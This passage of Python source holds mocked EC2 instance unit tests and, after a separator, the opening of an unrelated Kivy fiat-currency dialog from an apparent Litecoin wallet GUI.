reservations = conn.get_all_reservations(filters={"tag-key": "tag1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(filters={"tag-key": ["tag1", "tag3"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_instance_start_and_stop():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instances = reservation.instances
instances.should.have.length_of(2)
instance_ids = [instance.id for instance in instances]
with pytest.raises(EC2ResponseError) as ex:
stopped_instances = conn.stop_instances(instance_ids, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set"
)
stopped_instances = conn.stop_instances(instance_ids)
for instance in stopped_instances:
instance.state.should.equal("stopping")
with pytest.raises(EC2ResponseError) as ex:
started_instances = conn.start_instances([instances[0].id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set"
)
started_instances = conn.start_instances([instances[0].id])
started_instances[0].state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_reboot():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.reboot(dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set"
)
instance.reboot()
instance.state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_attribute_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("instanceType", "m1.small", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("instanceType", "m1.small")
instance_attribute = instance.get_attribute("instanceType")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("instanceType").should.equal("m1.small")
@mock_ec2_deprecated
def test_modify_instance_attribute_security_groups():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
sg_id = conn.create_security_group(
"test security group", "this is a test security group"
).id
sg_id2 = conn.create_security_group(
"test security group 2", "this is a test security group 2"
).id
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("groupSet", [sg_id, sg_id2], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("groupSet", [sg_id, sg_id2])
instance_attribute = instance.get_attribute("groupSet")
instance_attribute.should.be.a(InstanceAttribute)
group_list = instance_attribute.get("groupSet")
any(g.id == sg_id for g in group_list).should.be.ok
any(g.id == sg_id2 for g in group_list).should.be.ok
@mock_ec2_deprecated
def test_instance_attribute_user_data():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("userData", "this is my user data", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("userData", "this is my user data")
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("userData").should.equal("this is my user data")
@mock_ec2_deprecated
def test_instance_attribute_source_dest_check():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
# Default value is true
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
# Set to false (note: Boto converts bool to string, eg 'false')
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("sourceDestCheck", False, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("sourceDestCheck", False)
instance.update()
instance.sourceDestCheck.should.equal("false")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(False)
# Set back to true
instance.modify_attribute("sourceDestCheck", True)
instance.update()
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
@mock_ec2_deprecated
def test_user_data_with_run_instance():
user_data = b"some user data"
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)
instance = reservation.instances[0]
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
retrieved_user_data = instance_attribute.get("userData").encode("utf-8")
decoded_user_data = decode_method(retrieved_user_data)
decoded_user_data.should.equal(b"some user data")
@mock_ec2_deprecated
def test_run_instance_with_security_group_name():
conn = boto.connect_ec2("the_key", "the_secret")
with pytest.raises(EC2ResponseError) as ex:
group = conn.create_security_group("group1", "some description", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set"
)
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=["group1"])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_security_group_id():
conn = boto.connect_ec2("the_key", "the_secret")
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance = reservation.instances[0]
instance.instance_type.should.equal("t1.micro")
@mock_ec2_deprecated
def test_run_instance_with_default_placement():
conn = boto.ec2.connect_to_region("us-east-1")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1a")
@mock_ec2_deprecated
def test_run_instance_with_placement():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, placement="us-east-1b")
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1b")
@mock_ec2
def test_run_instance_with_subnet_boto3():
client = boto3.client("ec2", region_name="eu-central-1")
ip_networks = [
(ipaddress.ip_network("10.0.0.0/16"), ipaddress.ip_network("10.0.99.0/24")),
(
ipaddress.ip_network("192.168.42.0/24"),
ipaddress.ip_network("192.168.42.0/25"),
),
]
# Tests instances are created with the correct IPs
for vpc_cidr, subnet_cidr in ip_networks:
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
priv_ipv4 = ipaddress.ip_address(six.text_type(instance["PrivateIpAddress"]))
subnet_cidr.should.contain(priv_ipv4)
@mock_ec2
def test_run_instance_with_specified_private_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MaxCount=1,
MinCount=1,
SubnetId=subnet_id,
PrivateIpAddress="192.168.42.5",
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
instance["PrivateIpAddress"].should.equal("192.168.42.5")
@mock_ec2
def test_run_instance_mapped_public_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.modify_subnet_attribute(
SubnetId=subnet_id, MapPublicIpOnLaunch={"Value": True}
)
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance.should.contain("PublicDnsName")
instance.should.contain("PublicIpAddress")
len(instance["PublicDnsName"]).should.be.greater_than(0)
len(instance["PublicIpAddress"]).should.be.greater_than(0)
@mock_ec2_deprecated
def test_run_instance_with_nic_autocreated():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "10.0.0.1"
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
subnet_id=subnet.id,
security_groups=[security_group1.name],
security_group_ids=[security_group2.id],
private_ip_address=private_ip,
)
instance = reservation.instances[0]
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
eni = all_enis[0]
instance.interfaces.should.have.length_of(1)
instance.interfaces[0].id.should.equal(eni.id)
instance.subnet_id.should.equal(subnet.id)
instance.groups.should.have.length_of(2)
set([group.id for group in instance.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.subnet_id.should.equal(subnet.id)
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.private_ip_addresses.should.have.length_of(1)
eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@mock_ec2_deprecated
def test_run_instance_with_nic_preexisting():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "54.0.0.1"
eni = conn.create_network_interface(
subnet.id, private_ip, groups=[security_group1.id]
)
# Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...
# annoying, but generates the desired querystring.
from boto.ec2.networkinterface import (
NetworkInterfaceSpecification,
NetworkInterfaceCollection,
)
interface = NetworkInterfaceSpecification(
network_interface_id=eni.id, device_index=0
)
interfaces = NetworkInterfaceCollection(interface)
# end Boto objects
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
network_interfaces=interfaces,
security_group_ids=[security_group2.id],
)
instance = reservation.instances[0]
instance.subnet_id.should.equal(subnet.id)
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
instance.interfaces.should.have.length_of(1)
instance_eni = instance.interfaces[0]
instance_eni.id.should.equal(eni.id)
instance_eni.subnet_id.should.equal(subnet.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
instance_eni.private_ip_addresses.should.have.length_of(1)
instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_instance_with_nic_attach_detach():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
reservation = conn.run_instances(
EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]
)
instance = reservation.instances[0]
eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])
# Check initial instance and ENI data
instance.interfaces.should.have.length_of(1)
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Attach
with pytest.raises(EC2ResponseError) as ex:
conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.attach_network_interface(eni.id, instance.id, device_index=1)
# Check attached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(2)
instance_eni = instance.interfaces[1]
instance_eni.id.should.equal(eni.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
# Detach
with pytest.raises(EC2ResponseError) as ex:
conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.detach_network_interface(instance_eni.attachment.id)
# Check detached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(1)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Detach with invalid attachment ID
with pytest.raises(EC2ResponseError) as cm:
conn.detach_network_interface("eni-attach-1234abcd")
cm.value.code.should.equal("InvalidAttachmentID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ec2_classic_has_public_ip_address():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.ip_address.should_not.equal(None)
instance.public_dns_name.should.contain(instance.ip_address.replace(".", "-"))
instance.private_ip_address.should_not.equal(None)
instance.private_dns_name.should.contain(
instance.private_ip_address.replace(".", "-")
)
@mock_ec2_deprecated
def test_run_instance_with_keypair():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.key_name.should.equal("keypair_name")
@mock_ec2
def test_run_instance_with_block_device_mappings():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}}],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(50)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_ebs():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2"}],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter ebs"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_size():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeType": "standard"}}
],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter size or snapshotId"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_from_snapshot():
ec2_client = boto3.client("ec2", region_name="us-east-1")
ec2_resource = boto3.resource("ec2", region_name="us-east-1")
volume_details = {
"AvailabilityZone": "1a",
"Size": 30,
}
volume = ec2_resource.create_volume(**volume_details)
snapshot = volume.create_snapshot()
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"SnapshotId": snapshot.snapshot_id}}
],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(30)
volumes["Volumes"][0]["SnapshotId"].should.equal(snapshot.snapshot_id)
@mock_ec2_deprecated
def test_describe_instance_status_no_instances():
conn = boto.connect_ec2("the_key", "the_secret")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(0)
@mock_ec2_deprecated
def test_describe_instance_status_with_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(1)
all_status[0].instance_status.status.should.equal("ok")
all_status[0].system_status.status.should.equal("ok")
@mock_ec2_deprecated
def test_describe_instance_status_with_instance_filter_deprecated():
conn = boto.connect_ec2("the_key", "the_secret")
# We want to filter based on this one
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
# This is just to setup the test
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status(instance_ids=[instance.id])
len(all_status).should.equal(1)
all_status[0].id.should.equal(instance.id)
# Call get_all_instance_status with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_instance_status(instance_ids=[instance.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_describe_instance_credit_specifications():
conn = boto3.client("ec2", region_name="us-west-1")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
result = conn.describe_instance_credit_specifications(
InstanceIds=[reservation["Instances"][0]["InstanceId"]]
)
assert (
result["InstanceCreditSpecifications"][0]["InstanceId"]
== reservation["Instances"][0]["InstanceId"]
)
@mock_ec2
def test_describe_instance_status_with_instance_filter():
conn = boto3.client("ec2", region_name="us-west-1")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)
instance1 = reservation["Instances"][0]
instance2 = reservation["Instances"][1]
instance3 = reservation["Instances"][2]
conn.stop_instances(InstanceIds=[instance1["InstanceId"]])
stopped_instance_ids = [instance1["InstanceId"]]
running_instance_ids = sorted([instance2["InstanceId"], instance3["InstanceId"]])
all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)
# Filter instance using the state name
state_name_filter = {
"running_and_stopped": [
{"Name": "instance-state-name", "Values": ["running", "stopped"]}
],
"running": [{"Name": "instance-state-name", "Values": ["running"]}],
"stopped": [{"Name": "instance-state-name", "Values": ["stopped"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
# Filter instance using the state code
state_code_filter = {
"running_and_stopped": [
{"Name": "instance-state-code", "Values": ["16", "80"]}
],
"running": [{"Name": "instance-state-code", "Values": ["16"]}],
"stopped": [{"Name": "instance-state-code", "Values": ["80"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_describe_instance_status_with_non_running_instances():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
all_running_status = conn.get_all_instance_status()
all_running_status.should.have.length_of(1)
all_running_status[0].id.should.equal(instance3.id)
all_running_status[0].state_name.should.equal("running")
all_status = conn.get_all_instance_status(include_all_instances=True)
all_status.should.have.length_of(3)
status1 = next((s for s in all_status if s.id == instance1.id), None)
status1.state_name.should.equal("stopped")
status2 = next((s for s in all_status if s.id == instance2.id), None)
status2.state_name.should.equal("terminated")
status3 = next((s for s in all_status if s.id == instance3.id), None)
status3.state_name.should.equal("running")
@mock_ec2_deprecated
def test_get_instance_by_security_group():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID)
instance = conn.get_only_instances()[0]
security_group = conn.create_security_group("test", "test")
with pytest.raises(EC2ResponseError) as ex:
conn.modify_instance_attribute(
instance.id, "groupSet", [security_group.id], dry_run=True
)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
conn.modify_instance_attribute(instance.id, "groupSet", [security_group.id])
security_group_instances = security_group.instances()
assert len(security_group_instances) == 1
assert security_group_instances[0].id == instance.id
@mock_ec2
def test_modify_delete_on_termination():
ec2_client = boto3.resource("ec2", region_name="us-west-1")
result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
instance = result[0]
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(True)
instance.modify_attribute(
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": False}}
]
)
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(False)
@mock_ec2
def test_create_instance_ebs_optimized():
ec2_resource = boto3.resource("ec2", region_name="eu-west-1")
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True
)[0]
instance.load()
instance.ebs_optimized.should.be(True)
instance.modify_attribute(EbsOptimized={"Value": False})
instance.load()
instance.ebs_optimized.should.be(False)
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,
)[0]
instance.load()
instance.ebs_optimized.should.be(False)
@mock_ec2
def test_run_multiple_instances_in_same_command():
instance_count = 4
client = boto3.client("ec2", region_name="us-east-1")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count
)
reservations = client.describe_instances()["Reservations"]
reservations[0]["Instances"].should.have.length_of(instance_count)
instances = reservations[0]["Instances"]
for i in range(0, instance_count):
instances[i]["AmiLaunchIndex"].should.be(i)
@mock_ec2
def test_describe_instance_attribute():
client = boto3.client("ec2", region_name="us-east-1")
security_group_id = client.create_security_group(
GroupName="test security group", Description="this is a test security group"
)["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
SecurityGroupIds=[security_group_id],
)
instance_id = client.describe_instances()["Reservations"][0]["Instances"][0][
"InstanceId"
]
valid_instance_attributes = [
"instanceType",
"kernel",
"ramdisk",
"userData",
"disableApiTermination",
"instanceInitiatedShutdownBehavior",
"rootDeviceName",
"blockDeviceMapping",
"productCodes",
"sourceDestCheck",
"groupSet",
"ebsOptimized",
"sriovNetSupport",
]
for valid_instance_attribute in valid_instance_attributes:
response = client.describe_instance_attribute(
InstanceId=instance_id, Attribute=valid_instance_attribute
)
if valid_instance_attribute == "groupSet":
response.should.have.key("Groups")
response["Groups"].should.have.length_of(1)
response["Groups"][0]["GroupId"].should.equal(security_group_id)
elif valid_instance_attribute == "userData":
response.should.have.key("UserData")
response["UserData"].should.be.empty
invalid_instance_attributes = [
"abc",
"Kernel",
"RamDisk",
"userdata",
"iNsTaNcEtYpE",
]
for invalid_instance_attribute in invalid_instance_attributes:
with pytest.raises(ClientError) as ex:
client.describe_instance_attribute(
InstanceId=instance_id, Attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Code"].should.equal("InvalidParameterValue")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
message = "Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute.".format(
invalid_instance_attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Message"].should.equal(message)
@mock_ec2
def test_warn_on_invalid_ami():
if settings.TEST_SERVER_MODE:
raise SkipTest("Can't capture warnings in server mode.")
ec2 = boto3.resource("ec2", "us-east-1")
with pytest.warns(
PendingDeprecationWarning,
match=r"Could not find AMI with image-id:invalid-ami.+",
):
ec2.create_instances(ImageId="invalid-ami", MinCount=1, MaxCount=1)
|
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty, BooleanProperty
from kivy.lang import Builder
Builder.load_string('''
<FxDialog@Popup>
id: popup
title: 'Fiat Currency'
size_hint: 0.8, 0.8
pos_hint: {'top':0.9}
BoxLayout:
orientation: 'vertical'
Widget:
size_hint: 1, 0.1
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.1
Label:
text: _('Currency')
height: '48dp'
Spinner:
height: '48dp'
id: ccy
on_text: popup.on_currency(self.text)
Widget:
size_hint: 1, 0.05
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.2
Label:
text: _('History rates')
CheckBox:
id:hist
active: popup.has_history_rates
on_active: popup.on_checkbox_history(self.active)
Widget:
size_hint: 1, 0.05
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.1
Label:
text: _('Source')
height: '48dp'
Spinner:
height: '48dp'
id: exchanges
on_text: popup.on_exchange(self.text)
Widget:
size_hint: 1, 0.1
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.2
Button:
text: 'Cancel'
size_hint: 0.5, None
height: '48dp'
on_release: popup.dismiss()
Button:
text: 'OK'
size_hint: 0.5, None
height: '48dp'
on_release:
root.callback()
popup.dismiss()
''')
from kivy.uix.label import Label
from kivy.uix.checkbox import CheckBox
from kivy.uix.widget import Widget
from kivy.clock import Clock
from electrum_ltc.gui.kivy.i18n import _
from functools import partial
class FxDialog(Factory.Popup):
